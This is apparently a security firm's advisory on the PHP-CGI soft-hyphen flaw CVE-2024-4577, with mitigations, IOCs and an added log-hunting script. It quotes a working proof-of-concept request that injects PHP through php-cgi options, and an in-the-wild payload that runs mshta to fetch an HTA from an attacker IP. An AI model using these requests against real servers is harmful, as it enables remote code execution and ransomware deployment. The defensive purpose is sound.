Critical Vulnerability in PHP-CGI (CVE-2024-4577)

On June 6, 2024, cybersecurity firm Devcore published an advisory detailing a critical bug in the widely used web framework PHP-CGI. Successful exploitation of this vulnerability allows a remote attacker without credentials to perform remote code execution (RCE) on a targeted machine.

Executive Summary


Devcore found the vulnerability through their own research and reported on it here. Their testing discovered the bug in Windows-based PHP systems using Japanese and Chinese character sets. Although the vulnerability was not verified in other language locales, it should be assumed to affect all systems that use PHP-CGI. A day after the initial disclosure, another cybersecurity firm, Watchtowr, studied the vulnerability and published enough details for readers to develop proof-of-concept (PoC) exploits. Financially motivated threat actors wasted no time, and on June 10th cybersecurity firm Imperva reported observing the threat actor group TellYouThePass using this vulnerability to deploy their ransomware. We expect the volume of attacks to sharply increase in the coming days.

Given the ease of this attack, the severity of a successful exploit, and the reports of current use by ransomware threat actors, Lodestone believes immediate update of affected systems is crucial.

Affected Systems / Products

The vulnerability affects the following PHP versions:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Patches

Devcore worked closely with the PHP organization, who released patches at the time of disclosure here.

Mitigations / Workarounds

Devcore detailed some mitigation steps in their advisory but cautioned that they were only verified to work in specific environments.

Environments supporting Traditional Chinese, Simplified Chinese, and Japanese locales

Apply the following configuration:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

Environments using XAMPP for Windows

If you do not need PHP CGI in XAMPP, you can disable it by locating the file:

C:/xampp/apache/conf/extra/httpd-xampp.conf

And commenting out the following line:

ScriptAlias /php-cgi/ "C:/xampp/php/"

Technical Details

The most comprehensive writeup of the technical details behind this vulnerability can be found in the Watchtowr advisory. In short, the bug is due to a "best fit" character mapping that Windows applies when converting text from one character set to another. In this case, the problem occurs when a "soft hyphen" (represented digitally by the code 0xAD) is mapped to a "real hyphen" (represented digitally by the code 0x2D).

Normally, the hyphen character is used by PHP to pass execution arguments, so most PHP processes will handle this character in a secure way known as "escaping". However, in this case, there is an inconsistency where the main PHP process does escape a soft hyphen, but the PHP CGI process does not. This inconsistency is what allows attackers to insert arbitrary commands through remote, unauthenticated web requests.

The example proof of concept (PoC) provided by the Watchtowr team is as follows:

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

Detection Guidance

Fortunately, the soft-hyphen character causing this vulnerability is not often used in this way and should be easy to search for in network and system logs.

We recommend threat hunts and detection signatures based on web server requests containing the characters: 0xAD or %AD.

Any request that contains the 0xAD character in the URI is suspicious, and the payload the attacker attempted to execute will likely be found in the POST data. The following payloads have been reported in the wild:

  • <?php phpinfo(); ?>
  • <?php system("mshta hxxp://88.218.76[.]13/dd3.hta"); ?>
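The following script is an added example for the detection guidance above and the technical details before it; it is not code from the Lodestone advisory, Devcore, Watchtowr or Imperva. It scans access-log request lines for the 0xAD indicator, reconstructs the argument list a CGI server would build from such a query string (the RFC 3875 rule: a query string with no unencoded "=" is split on "+" and passed as arguments), applies the soft-hyphen-to-hyphen "best fit" translation the advisory describes, and rates the request "high" when the result would be a php-cgi option. The sample log lines are constructed for the example; the first reuses the public PoC request line quoted above, the others are invented for contrast.

```python
"""Added example (not from the Lodestone advisory): hunt for CVE-2024-4577
probes in web server access logs by looking for the soft hyphen (0xAD) in the
request URI, the indicator the advisory recommends searching for."""
import re
from urllib.parse import unquote_to_bytes

SOFT_HYPHEN = 0xAD   # U+00AD soft hyphen, best-fit mapped to '-' (0x2D) on affected locales
HYPHEN = 0x2D

# Matches the request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def contains_soft_hyphen(uri: str) -> bool:
    """True if the URI carries 0xAD either percent-encoded (%AD, any case) or as a raw byte."""
    return "%ad" in uri.lower() or "\xad" in uri


def cgi_argv_from_query(query: str) -> list[bytes]:
    """Reproduce the CGI rule (RFC 3875 section 4.4): a query string without an
    unencoded '=' is split on '+' and each piece is percent-decoded into an
    argument for the CGI binary. Returns [] when no argv would be built."""
    if "=" in query:
        return []
    return [unquote_to_bytes(part) for part in query.split("+") if part]


def best_fit(arg: bytes) -> bytes:
    """Model the 'best fit' translation the advisory describes: 0xAD becomes 0x2D."""
    return arg.replace(bytes([SOFT_HYPHEN]), bytes([HYPHEN]))


def classify_request(uri: str) -> dict:
    """Return a finding for one request URI; severity is 'none', 'suspicious' or 'high'."""
    finding = {"uri": uri, "severity": "none", "argv": []}
    if not contains_soft_hyphen(uri):
        return finding
    finding["severity"] = "suspicious"          # 0xAD in a URI is rare in legitimate traffic
    query = uri.partition("?")[2]
    argv = [best_fit(a) for a in cgi_argv_from_query(query)]
    finding["argv"] = argv
    # After best-fit mapping, a soft-hyphen-led token becomes a php-cgi option such as -d.
    if any(a.startswith(b"-") for a in argv):
        finding["severity"] = "high"
    return finding


def hunt(log_text: str) -> list[dict]:
    """Scan every request line in the log and return only the flagged ones."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            f = classify_request(m.group("uri"))
            if f["severity"] != "none":
                findings.append(f)
    return findings


# Constructed sample log lines (combined log format, not real traffic). The first
# reuses the public PoC request line from the advisory; the others are invented.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jun/2024:12:00:01 +0000] "POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "curl/8.3.0"
203.0.113.11 - - [10/Jun/2024:12:00:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Jun/2024:12:00:03 +0000] "GET /page.php?q=soft%adhyphen HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f["severity"], f["uri"], f["argv"])
```

Run against a real log, the "suspicious" tier catches every 0xAD occurrence as the advisory recommends, while the "high" tier isolates requests shaped like the PoC (no literal "=" in the query, so the server would pass the pieces as arguments, and a token that turns into an option after the best-fit mapping). Both tiers are worth reviewing; the split only orders the triage.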

The following IOCs were provided in the Imperva report:

  • URL : hxxp:/88.218.76[.]13/dd3.hta
  • C2 IP : 88.218.76[.]13
  • Hash (HTA sample): 95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3
  • Hash (HTA sample): 5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618
  • Hash (.NET binary): 9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53

Threat Intelligence

As mentioned, Imperva has observed the threat actor group TellYouThePass using this vulnerability to infiltrate vulnerable networks and deploy ransomware. TellYouThePass was first spotted in 2019, and while they are not as pervasive as other ransomware families, they are still known to refresh their ransomware tools (upgrading their locker from .NET to Golang) and use exploits quickly after disclosure (such as the recent log4j and ActiveMQ exploits).

They will certainly not be the only group to use this attack, as the low complexity of the attack will lead to many groups developing their own weaponized exploits soon.

How Lodestone is Responding

Lodestone is monitoring client perimeter devices discovered by Karma to identify potentially impacted devices and support organizations in remediation of any issues found.
